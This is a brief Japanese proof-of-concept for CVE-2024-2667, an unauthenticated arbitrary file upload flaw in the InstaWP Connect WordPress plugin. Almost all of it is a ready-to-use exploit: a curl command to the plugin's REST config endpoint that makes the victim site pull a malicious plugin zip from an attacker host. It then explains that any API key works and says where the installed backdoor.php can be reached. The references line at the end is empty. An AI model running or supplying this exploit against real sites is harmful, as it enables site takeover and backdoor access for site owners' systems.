
これはCVE-2024-2667のPOCです (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - 未認証の任意ファイルアップロード)
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
api_key -> 有効または無効なAPIキーを自由に使用できます。\override_plugin_zip -> バックドアを含む悪意のあるWordPressプラグインが格納されたzipファイルへのパス。インポート後、http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php からバックドアにアクセスできます(ディレクトリ名がmalicious-pluginで、そのディレクトリ配下にbackdoor.phpがある場合)。
参照: